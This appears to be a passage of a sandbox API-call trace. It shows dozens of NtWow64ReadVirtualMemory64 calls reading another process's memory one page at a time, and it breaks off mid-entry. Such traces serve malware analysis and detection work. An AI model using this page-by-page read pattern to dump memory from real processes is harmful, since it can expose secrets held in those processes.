NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e4000, Buffer=0x7ff8, BufferSize=0x2724000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.601] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e5000, Buffer=0x7ff8, BufferSize=0x2725000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.601] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e6000, Buffer=0x7ff8, BufferSize=0x2726000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.601] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e7000, Buffer=0x7ff8, BufferSize=0x2727000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.601] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e8000, Buffer=0x7ff8, BufferSize=0x2728000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.601] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e9000, Buffer=0x7ff8, BufferSize=0x2729000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.602] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ea000, Buffer=0x7ff8, BufferSize=0x272a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.602] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3eb000, Buffer=0x7ff8, BufferSize=0x272b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.602] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ec000, Buffer=0x7ff8, BufferSize=0x272c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.602] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ed000, Buffer=0x7ff8, BufferSize=0x272d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.602] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ee000, Buffer=0x7ff8, BufferSize=0x272e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.602] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ef000, Buffer=0x7ff8, BufferSize=0x272f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.602] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f0000, Buffer=0x7ff8, BufferSize=0x2730000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f1000, Buffer=0x7ff8, BufferSize=0x2731000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f2000, Buffer=0x7ff8, BufferSize=0x2732000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f3000, Buffer=0x7ff8, BufferSize=0x2733000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f4000, Buffer=0x7ff8, BufferSize=0x2734000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f5000, Buffer=0x7ff8, BufferSize=0x2735000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f6000, Buffer=0x7ff8, BufferSize=0x2736000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f7000, Buffer=0x7ff8, BufferSize=0x2737000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.604] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f8000, Buffer=0x7ff8, BufferSize=0x2738000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.604] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f9000, Buffer=0x7ff8, BufferSize=0x2739000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.604] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fa000, Buffer=0x7ff8, BufferSize=0x273a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.604] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fb000, Buffer=0x7ff8, BufferSize=0x273b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.604] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fc000, Buffer=0x7ff8, BufferSize=0x273c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.609] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fd000, Buffer=0x7ff8, BufferSize=0x273d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.610] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fe000, Buffer=0x7ff8, BufferSize=0x273e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.610] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ff000, Buffer=0x7ff8, BufferSize=0x273f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.610] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee400000, Buffer=0x7ff8, BufferSize=0x2740000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.610] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee401000, Buffer=0x7ff8, BufferSize=0x2741000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.610] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee402000, Buffer=0x7ff8, BufferSize=0x2742000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.610] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee403000, Buffer=0x7ff8, BufferSize=0x2743000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.611] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee404000, Buffer=0x7ff8, BufferSize=0x2744000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.611] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee405000, Buffer=0x7ff8, BufferSize=0x2745000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.611] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee406000, Buffer=0x7ff8, BufferSize=0x2746000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.611] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee407000, Buffer=0x7ff8, BufferSize=0x2747000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.611] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee408000, Buffer=0x7ff8, BufferSize=0x2748000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.611] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee409000, Buffer=0x7ff8, BufferSize=0x2749000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.611] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40a000, Buffer=0x7ff8, BufferSize=0x274a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.612] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40b000, Buffer=0x7ff8, BufferSize=0x274b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.612] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40c000, Buffer=0x7ff8, BufferSize=0x274c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.612] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40d000, Buffer=0x7ff8, BufferSize=0x274d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.612] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40e000, Buffer=0x7ff8, BufferSize=0x274e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.612] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40f000, Buffer=0x7ff8, BufferSize=0x274f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.612] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee410000, Buffer=0x7ff8, BufferSize=0x2750000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.613] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee411000, Buffer=0x7ff8, BufferSize=0x2751000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.613] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee412000, Buffer=0x7ff8, BufferSize=0x2752000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.613] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee413000, Buffer=0x7ff8, BufferSize=0x2753000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.613] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee414000, Buffer=0x7ff8, BufferSize=0x2754000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.613] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee415000, Buffer=0x7ff8, BufferSize=0x2755000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.613] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee416000, Buffer=0x7ff8, BufferSize=0x2756000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.614] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee417000, Buffer=0x7ff8, BufferSize=0x2757000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.614] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee418000, Buffer=0x7ff8, BufferSize=0x2758000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.614] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee419000, Buffer=0x7ff8, BufferSize=0x2759000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.614] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41a000, Buffer=0x7ff8, BufferSize=0x275a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.614] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41b000, Buffer=0x7ff8, BufferSize=0x275b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.614] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41c000, Buffer=0x7ff8, BufferSize=0x275c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.614] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41d000, Buffer=0x7ff8, BufferSize=0x275d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.615] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41e000, Buffer=0x7ff8, BufferSize=0x275e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.615] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41f000, Buffer=0x7ff8, BufferSize=0x275f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.615] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee420000, Buffer=0x7ff8, BufferSize=0x2760000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.615] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee421000, Buffer=0x7ff8, BufferSize=0x2761000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.615] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee422000, Buffer=0x7ff8, BufferSize=0x2762000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.615] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee423000, Buffer=0x7ff8, BufferSize=0x2763000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.616] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee424000, Buffer=0x7ff8, BufferSize=0x2764000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.616] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee425000, Buffer=0x7ff8, BufferSize=0x2765000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.616] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee426000, Buffer=0x7ff8, BufferSize=0x2766000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.616] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee427000, Buffer=0x7ff8, BufferSize=0x2767000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.616] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee428000, Buffer=0x7ff8, BufferSize=0x2768000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.616] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee429000, Buffer=0x7ff8, BufferSize=0x2769000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.616] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42a000, Buffer=0x7ff8, BufferSize=0x276a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.617] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42b000, Buffer=0x7ff8, BufferSize=0x276b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.617] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42c000, Buffer=0x7ff8, BufferSize=0x276c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.617] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42d000, Buffer=0x7ff8, BufferSize=0x276d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.617] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42e000, Buffer=0x7ff8, BufferSize=0x276e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.617] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42f000, Buffer=0x7ff8, BufferSize=0x276f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.617] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee430000, Buffer=0x7ff8, BufferSize=0x2770000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.618] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee431000, Buffer=0x7ff8, BufferSize=0x2771000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.618] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee432000, Buffer=0x7ff8, BufferSize=0x2772000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.618] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee433000, Buffer=0x7ff8, BufferSize=0x2773000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.618] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee434000, Buffer=0x7ff8, BufferSize=0x2774000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.618] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee435000, Buffer=0x7ff8, BufferSize=0x2775000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.618] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee436000, Buffer=0x7ff8, BufferSize=0x2776000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.619] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee437000, Buffer=0x7ff8, BufferSize=0x2777000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.619] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee438000, Buffer=0x7ff8, BufferSize=0x2778000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.619] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee439000, Buffer=0x7ff8, BufferSize=0x2779000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.619] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43a000, Buffer=0x7ff8, BufferSize=0x277a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.619] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43b000, Buffer=0x7ff8, BufferSize=0x277b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.619] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43c000, Buffer=0x7ff8, BufferSize=0x277c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.619] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43d000, Buffer=0x7ff8, BufferSize=0x277d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.620] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43e000, Buffer=0x7ff8, BufferSize=0x277e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.620] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee43f000, Buffer=0x7ff8, BufferSize=0x277f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.621] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee440000, Buffer=0x7ff8, BufferSize=0x2780000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.621] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee441000, Buffer=0x7ff8, BufferSize=0x2781000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.621] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee442000, Buffer=0x7ff8, BufferSize=0x2782000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.621] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee443000, Buffer=0x7ff8, BufferSize=0x2783000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.622] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee444000, Buffer=0x7ff8, BufferSize=0x2784000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.622] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee445000, Buffer=0x7ff8, BufferSize=0x2785000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.622] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee446000, Buffer=0x7ff8, BufferSize=0x2786000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.622] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee447000, Buffer=0x7ff8, BufferSize=0x2787000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.622] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee448000, Buffer=0x7ff8, BufferSize=0x2788000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.622] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee449000, Buffer=0x7ff8, BufferSize=0x2789000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.623] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44a000, Buffer=0x7ff8, BufferSize=0x278a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.623] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44b000, Buffer=0x7ff8, BufferSize=0x278b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.623] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44c000, Buffer=0x7ff8, BufferSize=0x278c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.623] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44d000, Buffer=0x7ff8, BufferSize=0x278d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.623] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44e000, Buffer=0x7ff8, BufferSize=0x278e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.623] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee44f000, Buffer=0x7ff8, BufferSize=0x278f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.624] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee450000, Buffer=0x7ff8, BufferSize=0x2790000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.624] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee451000, Buffer=0x7ff8, BufferSize=0x2791000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.624] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee452000, Buffer=0x7ff8, BufferSize=0x2792000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.624] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee453000, Buffer=0x7ff8, BufferSize=0x2793000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.624] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee454000, Buffer=0x7ff8, BufferSize=0x2794000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.624] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee455000, Buffer=0x7ff8, BufferSize=0x2795000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, 